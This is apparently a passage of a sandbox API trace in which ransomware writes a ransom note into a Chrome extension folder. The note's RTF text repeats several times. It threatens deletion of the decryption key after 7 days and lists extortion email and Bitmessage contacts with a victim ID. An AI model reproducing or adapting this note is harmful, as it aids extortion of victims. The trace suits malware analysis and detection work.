}}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nzráb\x95.ê©ÀAH\x01¹HÂP[w.\x80¬Ñ%cD", lpUsedDefaultChar=0x0) returned 8717 [0278.588] WriteFile (in: hFile=0x2c8, lpBuffer=0x1ef5068*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef5068*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.589] CloseHandle (hObject=0x2c8) returned 1 [0278.589] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\#readme_eman#.rtf")) returned 0xffffffff [0278.589] GetLastError () returned 0x2 [0278.589] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0278.847] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.847] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.847] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd 